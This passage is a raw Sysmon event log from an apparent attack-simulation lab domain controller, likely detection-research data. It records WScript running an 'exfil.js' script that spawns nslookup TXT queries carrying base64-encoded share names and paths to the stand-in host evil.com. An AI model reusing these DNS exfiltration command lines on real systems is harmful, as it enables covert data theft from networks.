Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.606{2E1864BB-17B4-629A-323F-000000005F02}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000197394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.590{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-313F-000000005F02}7052C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.590{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-313F-000000005F02}7052C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.590{2E1864BB-17B4-629A-313F-000000005F02}70527292C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-303F-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-313F-000000005F02}7052C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-303F-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-17A1-629A-783D-000000005F02}55526984C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-303F-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.578{2E1864BB-17B4-629A-303F-000000005F02}7700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldtsprr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.574{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbjwxbd.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.543{2E1864BB-17B4-629A-2E3F-000000005F02}54883300C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-2F3F-000000005F02}7672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.543{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-2F3F-000000005F02}7672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.543{2E1864BB-17B4-629A-2D3F-000000005F02}16604208C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-2F3F-000000005F02}7672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.552{2E1864BB-17B4-629A-2F3F-000000005F02}7672C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-2D3F-000000005F02}1660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbjwxbd.tmp 2>&1 10341000x8000000000000000197374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.511{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-2E3F-000000005F02}5488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.511{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-2E3F-000000005F02}5488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.507{2E1864BB-17B4-629A-2E3F-000000005F02}54883300C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-2D3F-000000005F02}1660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.489{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-2E3F-000000005F02}5488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.473{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-2D3F-000000005F02}1660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.473{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.473{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.473{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.473{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.473{2E1864BB-17A1-629A-783D-000000005F02}55522108C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-2D3F-000000005F02}1660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.483{2E1864BB-17B4-629A-2D3F-000000005F02}1660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT 